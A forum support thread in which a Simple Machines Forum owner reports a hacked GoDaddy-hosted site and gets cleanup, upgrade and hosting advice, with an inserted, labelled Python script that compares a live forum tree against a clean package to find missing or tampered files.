
Can't Login as Admin

Started by me314159, August 23, 2021, 11:07:32 PM


me314159

I've got an SMF (not sure if it is 2.0 or 2.1).  My username shows up when I visit - but I cannot login to the Admin area.  I get this message when I try to enter the Admin areas:

"Session verification failed. Please try logging out and back in again, and then try again."

Also, even though it looks like I'm logged in (my user name is there) I cannot post - I get this message when trying to post:

"Your session timed out while posting. Please try to re-submit your message."

Interestingly, I have pretty much the same problem with a second SMF site.  They are both on the same server - other than that I don't believe there's anything in common with the two SMF sites.

Any idea what I should do next?


----  EDIT ----

I ftp'd into one of the forums.  I feel that I have found suspicious php files.  First, there are a few files with an 8/10/2021 date (Aug 10) which I KNOW I haven't even ftp'd in quite some time.  There are a few others with a 4/22/2021 date which I kind of doubt were me.

index.php  8/10/202
.user.ini      8/10/202
draped-chan.php    4/22/2021
.htaccess  4/22/2021
cvtbadee.php  4/22/2021

I've downloaded index.php and can't tell if anything is in there that should not be there - but cvtbadee.php is definitely bogus.  I'm deleting cvtbadee.php right now.    Here is what's inside cvtbadee.php:


Kindred

Yeah, that's a hack.

You need to clean everything.

Delete all files and directories other than settings.php, avatars and attachments
Then upload a clean set of files from the upgrade archive
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

me314159

Is it possible to download SMF 2.0.11?   I think I saw SMF 2.0.18 - but not SMF 2.0.11.

LiroyvH

Yes, but why do you want to download 2.0.11?
((U + C + I)x(10 − S)) / 20xAx1 / (1 − sin(F / 10))
President/CEO of Simple Machines - Server Manager
Please do not PM for support - anything else is usually OK.

me314159


shadav

might as well get up to date as there's been quite a few security updates since then

make sure to change your hosting account password
and let your host know because they could have gotten access from another hosting account on the same server if you are using a shared server
or at least let them know so they can help track how/when it happened

LiroyvH

Quote from: me314159 on August 24, 2021, 12:38:52 AM
That's what is installed.

That hasn't properly been attended to for years then, I'm afraid to say. Since the release of 2.0.11 there have been 7 updates including security patches and compatibility enhancements (eg: PHP 7.4). It is important to keep your SMF installation up to date for a large variety of reasons; one of which is security. Best not neglect it.

As shadav suggests, since you have to reload the files anyway: might as well properly do it and upgrade it to the latest stable version 2.0.18. This solves multiple problems at once. :)

Having said that, please note that the infection didn't necessarily come in through SMF; in fact it may even be considered as rather unlikely. So the important question is: are you running any other software on the account? For example WordPress with plugins, especially if they're also highly outdated, is notorious for getting accounts compromised. In which case cleaning up just the SMF folder isn't enough, you'd have to clean up the entire account and bring *all* your software and plugins up to date.

Doug Heffernan

I can not stress enough the importance of always keeping everything up to date with the latest version. Be that a forum, cms, portals, mods etc.

That being said, I would do a thorough check up of the server space if I was you to make sure that there are no more backdoors.

And try and find out the point of entry a.s.a.p. Your host can help you with that by checking their raw access logs and see how they got in. Like that you can patch up the security hole.

me314159

I've got this weird and bizarre issue - I can upload the new (uninfected files from smf_2-0-11_upgrade) SMF 2.011, but then at least one file never makes it there: Subs-Auth.php

But, I give it a high probability that other files aren't making their way to my hosting site via ftp.

I was going round-and-round last night before realizing what was happening.  For reasons totally not clear to me when Subs-Auth.php gets uploaded it disappears really fast.

So then . . .

I go to my hosting site's file manager and I discover I CAN upload Subs-Auth.php without an issue. It doesn't vanish upon uploading.  Good!  Great!  I should be up and running in five minutes - right?

Wrong!

My hosting site's file manager basically doesn't have facilities to upload directories.  I can upload only files - not any directories.  So, that means, I'd have to manually piece together every folder, and every nested folder.

kill me now

shadav

what ftp are you using? try a different ftp client
filezilla has known issues like this not uploading all files

also again, you really should be using smf 2.0.18, as you are several versions behind where there's been several security updates and other important updates

have you contacted your host about the hack? so that they can research how it happened and they can help stop it from happening again?

if you are using other scripts on your site, have you made sure that they are clean files and updated them to their current versions?

me314159

I'm using FileZilla.  I have Coda 2 - maybe that'll work normally.

Okay, I'll upload 2.018

I contacted my host about the hack - they didn't seem concerned.

Other websites I have on the same hosting server appear to have been invaded.   

Egad.

shadav

well if you are using the same script on those sites it was either that script

or they found a security issue with the server and were able to attack every site hosted on that server

and if your host is nonchalant about it, you need a new/better host ASAP like right right now because even if a script is insecure, the host should have protections in place that would still prevent hacks (just saying) I mean it'd still be possible to hack a site but if a host isn't on top of things it makes it a lot easier.

Sir Osis of Liver

The upload fails are not a FileZilla problem, the files upload successfully but are immediately deleted by misconfigured server security.  This was a common problem on GoDaddy for quite a while.  Should be able to upload the missing files via cpanel filemanager.  If it won't let you upload a directory, upload the zip, you should be able to unzip it on server with filemanager.  And use 2.0.18 package, there were no database changes in 2.0 branch, your db will run equally well in .11 or .18.
Ashes and diamonds, foe and friend,
 we were all equal in the end.

                                     - R. Waters

Kindred

did you DELETE all the files and directories that I suggested?

You can UPLOAD the SMF ZIP archive and then run the EXTRACT from the hosting file manager.... you don't have to upload every file individually.

me314159

Quote from: Kindred on August 24, 2021, 05:38:08 PM
did you DELETE all the files and directories that I suggested?

You can UPLOAD the SMF ZIP archive and then run the EXTRACT from the hosting file manager.... you don't have to upload every file individually.


Sure did.  I was able to use Coda to move all the files/directories - seemingly without loss of files or directories (this has not been verified).  I'd rather upload a zip - I'll look into that.
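
Added example, not part of any post in this thread and not SMF project code: a sketch that checks an uploaded forum tree against the unpacked clean package, reporting files that went missing in transit, differ from the package, or were never shipped, plus executable files sitting inside the directories the cleanup kept. The preserved names follow Kindred's advice above; the extension list, the function names and the constructed demo trees are assumptions.

```python
import hashlib
import tempfile
from pathlib import Path

# Assumption: paths the cleanup advice in this thread keeps rather than replaces.
PRESERVED = ("Settings.php", "avatars", "attachments")
# Assumption: file types that can run or reconfigure PHP; not expected among kept uploads.
EXECUTABLE = (".php", ".phtml", ".htaccess", ".user.ini")

def sha256_tree(root):
    """Map each file's path relative to root to the SHA-256 of its contents."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}

def audit(clean_dir, live_dir):
    """Compare a live forum tree with the unpacked clean package."""
    clean, live = sha256_tree(clean_dir), sha256_tree(live_dir)
    report = {"missing": [], "modified": [], "unexpected": [], "kept_but_executable": []}
    for rel in clean:
        if rel not in live:
            report["missing"].append(rel)        # upload dropped or deleted server-side
        elif live[rel] != clean[rel]:
            report["modified"].append(rel)       # differs from the package copy
    for rel in live:
        if rel in clean:
            continue
        if rel.split("/")[0] in PRESERVED:       # kept data: only flag runnable files
            if rel != "Settings.php" and rel.lower().endswith(EXECUTABLE):
                report["kept_but_executable"].append(rel)
        else:
            report["unexpected"].append(rel)     # never shipped in the package
    return report

def demo():
    """Audit two small constructed trees (sample data, not from the thread's server)."""
    clean_files = {"index.php": "<?php // package", "Sources/Subs-Auth.php": "<?php // auth"}
    live_files = {"index.php": "<?php // changed", "Settings.php": "<?php // db",
                  "cvtbadee.php": "<?php", "attachments/1_abc": "data", "avatars/x.php": "<?php"}
    with tempfile.TemporaryDirectory() as tmp:
        for name, files in (("clean", clean_files), ("live", live_files)):
            for rel, body in files.items():
                target = Path(tmp, name, rel)
                target.parent.mkdir(parents=True, exist_ok=True)
                target.write_text(body)
        return audit(Path(tmp, "clean"), Path(tmp, "live"))

if __name__ == "__main__":
    print(demo())
```

Run `audit()` against a downloaded copy of the live tree and the extracted package of the same SMF version; files the package ships inside `avatars` or `attachments` are compared by hash like any other packaged file.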

me314159

Should I be using something higher than PHP version 5.4.19?

Sir Osis of Liver

PHP 5.4 went eol Sep 2015, it's unsupported and insecure.  SMF 2.0.18 supports up to php 7.4.

https://www.php.net/supported-versions.php
https://www.php.net/eol.php


me314159

My hosting site was PHP 5.6 last night - I kid you NOT - today it mysteriously downgraded on its own to 5.4. 

Sir Osis of Liver


me314159

Godaddy.  I just got off the phone with them - they told me within the last hour I was downgraded to php 5.4 - they could see that in their logs.   Why? They didn't know why.   I asked, if I can downgrade (which I totally did not) - and Godaddy said no, I can only upgrade - and I can't go backward.  And, for this hosting site php 5.6 is the highest php version available.   

I can tell what I was doing exactly when the downgrade occurred.  I was trying to get the broken SMF running - and while troubleshooting (running repair_settings.php) or even just accessing the site at all caused my entire host to stop responding for roughly 5 to 15 minutes.  No ftp, and no websites functioning.  I could reproduce this - and did so several times.

My imagination runs wild.  Can malware downgrade PHP?  Does the server have some sort of panic option that would invoke a php downgrade?  That sounds crazy.  How would that even help?

Stay tuned . . . the entertainment has just begun.
